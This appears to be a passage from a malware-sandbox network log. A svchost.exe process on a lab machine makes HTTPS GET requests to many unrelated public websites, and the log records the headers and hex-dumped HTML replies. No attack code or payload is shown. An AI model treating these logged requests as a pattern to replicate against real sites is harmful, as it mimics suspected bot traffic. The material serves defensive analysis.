                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:56 UTC2492INData Raw: 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 4f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 3e 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 46 6c 61 6d 69 6e 67 6f 20 52 65 63 6f 72 64 69 6e 67 73 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 70 72 6f 70 3d 22 61 75 74 68 6f 72 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 50 65 72 73 6f 6e 22 3e 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 66 6c 61 6d 69 6e 67 6f 72 65 63 6f 72 64 69 6e 67 73 2e 63 6f 6d 2f 61 75 74 68 6f 72 2f 61 64 6d 69 6e 2f 22 20 2f 3e 3c 6d 65 74 61 20 69
                                                                                                                                                                                                                                                                                                      Data Ascii: temtype="https://schema.org/Organization"><meta itemprop="name" content="Flamingo Recordings"></div><div itemscope itemprop="author" itemtype="https://schema.org/Person"><meta itemprop="url" content="https://flamingorecordings.com/author/admin/" /><meta i
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:56 UTC2508INData Raw: 6e 62 6b 4f 58 5f 68 6c 7a 6e 72 64 42 57 48 52 77 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 22 20 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 62 20 66 61 2d 79 6f 75 74 75 62 65 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 2f 69 3e 20 3c 2f 61 3e 20 3c 2f 73 70 61 6e 3e 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 6c 2d 69 63 6f 6e 22 3e 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 69 6e 73 74 61 67 72 61 6d 2e 63 6f 6d 2f 66 6c 61 6d 69 6e 67 6f 72 65 63 6f 72 64 69 6e 67 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 22 20 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 62 20 66 61 2d 69 6e 73 74 61 67 72 61 6d 22 20
                                                                                                                                                                                                                                                                                                      Data Ascii: nbkOX_hlznrdBWHRw" target="_blank" rel="noopener" > <i class="fab fa-youtube" aria-hidden="true"></i> </a> </span> <span class="fl-icon"> <a href="https://www.instagram.com/flamingorecordings/" target="_blank" rel="noopener" > <i class="fab fa-instagram"


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      78192.168.2.5274225.189.171.125443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:56 UTC2702OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: www.muhr-soehne.de
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:56 UTC2735INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:56 GMT
                                                                                                                                                                                                                                                                                                      Server: Apache/2.4.38 (Debian)
                                                                                                                                                                                                                                                                                                      Last-Modified: Thu, 02 Mar 2023 15:05:19 GMT
                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                      Content-Length: 51841
                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:56 UTC2735INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 64 65 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 21 2d 2d 20 0a 09 6d 61 64 65 20 62 79 20 50 53 56 6e 65 6f 0a 0a 09 54 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 70 6f 77 65 72 65 64 20 62 79 20 54 59 50 4f 33 20 2d 20 69 6e 73 70 69 72 69 6e 67 20 70 65 6f 70 6c 65 20 74 6f 20 73 68 61 72 65 21 0a 09 54 59 50 4f 33 20 69 73 20 61 20 66 72 65 65 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 20 46 72 61 6d 65 77 6f 72 6b 20 69 6e 69 74 69 61 6c 6c 79 20 63 72 65 61 74 65 64 20 62 79 20 4b 61 73 70 65 72 20 53 6b 61 61 72 68 6f 6a 20
                                                                                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html dir="ltr" lang="de"><head><meta charset="utf-8">... made by PSVneoThis website is powered by TYPO3 - inspiring people to share!TYPO3 is a free open source Content Management Framework initially created by Kasper Skaarhoj
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:56 UTC2751INData Raw: 20 20 20 20 20 20 20 56 65 72 73 63 68 6c 69 65 c3 9f 6d 61 73 63 68 69 6e 65 6e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 6c 61 79 6f 75 74 2d 30 20 20 22 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 76 65 72 73 63 68 6c 69 65
                                                                                                                                                                                                                                                                                                      Data Ascii: Verschliemaschinen </a> </li> <li class="nav-item layout-0 "> <a href="/verschlie
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:56 UTC2767INData Raw: 66 72 61 6d 65 2d 6c 61 79 6f 75 74 2d 30 20 20 20 6d 74 2d 30 20 6d 62 2d 30 0a 20 20 20 20 0a 0a 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 6c 2d 33 20 63 6f 6c 2d 6c 67 2d 36 20 63 6f 6c 2d 6d 64 2d 36 20 63 6f 6c 2d 73 6d 2d 31 32 20 63 6f 6c 2d 31 32 20 6d 79 2d 34 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 65 72 76 69 63 65 62 6f 78 20 68 2d 31 30 30 20 62 67 2d 6c 69 67 68 74 2d 67 72 65 79 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 63 6f 6c 75 6d 6e 20 68 2d 31 30 30 20 77 2d 31 30 30 20 70 2d 33 20 22 3e 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: frame-layout-0 mt-0 mb-0 "> <div class="row"> <div class="col-xl-3 col-lg-6 col-md-6 col-sm-12 col-12 my-4"> <div class="servicebox h-100 bg-light-grey d-flex flex-column h-100 w-100 p-3 ">
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:56 UTC2783INData Raw: 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 63 65 6e 74 65 72 20 6d 79 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 78 2d 30 20 6d 78 2d 6d 64 2d 35 20 6d 79 2d 32 20 6d 79 2d 6d 64 2d 30 22 20 69 74 65 6d 70 72 6f 70 3d 22 69 74 65 6d 4c 69 73 74 45 6c 65 6d 65 6e 74 22 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 4c 69 73 74 49 74 65 6d 22 20 61 72 69 61 2d 63 75 72 72 65 6e 74 3d 22 70 61 67 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72
                                                                                                                                                                                                                                                                                                      Data Ascii: justify-content-center my-3"> <li class="mx-0 mx-md-5 my-2 my-md-0" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem" aria-current="page"> <a hr


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      79192.168.2.52741575.2.95.235443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:56 UTC2735OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: ldh.la.gov
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:56 UTC2786INHTTP/1.1 406 Not Acceptable
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:56 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                      Content-Length: 1346
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                      X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:56 UTC2786INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 36 20 2d 20 43 6c 69
                                                                                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>406 - Cli
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:56 UTC2787INData Raw: 6e 6f 74 20 61 63 63 65 70 74 2e 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73 65 74 3e 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: not accept.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      8192.168.2.550315185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:31 UTC65OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: techtrans.de
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:31 UTC65INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:44:31 GMT
                                                                                                                                                                                                                                                                                                      Server: Apache
                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                                                      Expires: 0
                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                      Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                      Connection: Upgrade, close
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:31 UTC66INData Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c
                                                                                                                                                                                                                                                                                                      Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      80192.168.2.527444172.67.156.49443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3043OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: orlyhotel.com
                                                                                                                                                                                                                                                                                                      Cookie: django_language=en
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3172INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:57 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Cache-Control: max-age=0, no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                      Expires: Wed, 22 Mar 2023 04:35:50 GMT
                                                                                                                                                                                                                                                                                                      Content-Language: en
                                                                                                                                                                                                                                                                                                      Last-Modified: Wed, 22 Mar 2023 04:35:50 GMT
                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                      Vary: Accept-Language
                                                                                                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ClVBsrMd7t0zQhtOtdo75nGXclBSmZbpfonFtnCJ5VhMmLV73m9m5%2F8IsnFR9UznEuow8WbJORJMUHWt1Drt66uv6ZtLsFZxFULSZIYDjoFyN8ZvTR%2BxQZxIhClqIiLO"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                                      CF-RAY: 7abbc9c02e40905e-FRA
                                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3173INData Raw: 31 62 0d 0a 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 20 28 35 30 30 29 3c 2f 68 31 3e 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 1b<h1>Server Error (500)</h1>
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3173INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      81192.168.2.527443172.67.164.178443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3043OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: clinicasanluis.com.co
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3176INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:57 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Expires: Wed, 17 Aug 2005 00:00:00 GMT
                                                                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                      Set-Cookie: d55e479f054c94814cbc10d217aaa990=5959a3d3d2199a3331172331f86494c2; path=/; HttpOnly
                                                                                                                                                                                                                                                                                                      Last-Modified: Wed, 22 Mar 2023 04:45:57 GMT
                                                                                                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=x1mdkWLzgBwFroz0DV7ZaRg0cUwnTR3l%2F2ukM5JskSNG1kO%2BTYwgewBzR2WzoRIUuvNGa1u7vUfzNVxn3uM2seDHFBCzQ9k57P3O%2FWjOuEJ7zNdiGnqQx5BD5cCmDBNxzaxLLNZF2kM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                                      CF-RAY: 7abbc9c04b15bb73-FRA
                                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3177INData Raw: 37 63 35 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 45 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 22 20
                                                                                                                                                                                                                                                                                                      Data Ascii: 7c50<!DOCTYPE html><html lang="es-ES" dir="ltr"><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta charset="utf-8" /><base href="https://clinicasanluis.com.co/"
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3177INData Raw: 72 65 66 3d 22 2f 70 6c 75 67 69 6e 73 2f 73 79 73 74 65 6d 2f 72 6f 6b 62 6f 78 2f 61 73 73 65 74 73 2f 73 74 79 6c 65 73 2f 72 6f 6b 62 6f 78 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 6f 64 75 6c 65 73 2f 6d 6f 64 5f 70 6f 70 75 70 61 68 6f 6c 69 63 2f 63 73 73 2f 6a 71 75 65 72 79 2e 67 61 66 61 6e 63 79 62 6f 78 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f
                                                                                                                                                                                                                                                                                                      Data Ascii: ref="/plugins/system/rokbox/assets/styles/rokbox.css" rel="stylesheet" /><link href="/modules/mod_popupaholic/css/jquery.gafancybox.min.css" rel="stylesheet" /><link href="/media/gantry5/assets/css/font-awesome.min.css" rel="stylesheet" /><link href="/
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3178INData Raw: 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 63 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 63 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 6d 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74
                                                                                                                                                                                                                                                                                                      Data Ascii: dia/system/js/core.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/media/system/js/mootools-core.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/media/system/js/mootools-more.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3180INData Raw: 73 2f 68 74 6d 6c 35 73 68 69 76 2d 70 72 69 6e 74 73 68 69 76 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 65 6e 67 69 6e 65 73 2f 6e 75 63 6c 65 75 73 2f 63 73 73 2f 6e 75 63 6c 65 75 73 2d 69 65 39 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 74 63 68 6d 65 64 69 61 2e 70 6f 6c 79 66 69 6c 6c 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20
                                                                                                                                                                                                                                                                                                      Data Ascii: s/html5shiv-printshiv.min.js"></script> <link rel="stylesheet" href="/media/gantry5/engines/nucleus/css/nucleus-ie9.css" type="text/css"/> <script type="text/javascript" src="/media/gantry5/assets/js/matchmedia.polyfill.js"></script>
